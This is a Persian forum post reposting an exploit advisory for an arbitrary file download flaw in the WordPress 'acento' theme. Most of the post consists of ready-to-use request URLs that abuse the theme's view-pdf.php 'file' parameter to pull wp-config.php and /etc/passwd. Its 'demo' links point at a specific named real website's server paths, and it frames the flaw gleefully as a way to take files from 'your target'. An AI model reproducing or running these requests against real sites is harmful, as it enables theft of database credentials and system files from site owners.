SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress acento theme Arbitrary File Download Vulnerability

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress acento theme Arbitrary File Download Vulnerability

    کد:
    #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    # Title : WordPress acento theme Arbitrary File Download Vulnerability
    # Author : alieye
    # vondor : http://www.wpbyexample.com/detail/acentocultural.com
    # Contact : [email protected]
    # Risk : High
    # Class: Remote
    # Date: 01/09/2014
    #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     
     
     
    You can download any file from your target ;)
     
     
    exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
     
     
    Demo:
     
    1-download wp-config.php file from site:
     
    http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php
     
    2-download passwd file from root:
     
    http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd
    online demo :

    http://www.acentocultural.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]
صبر کنید ..
X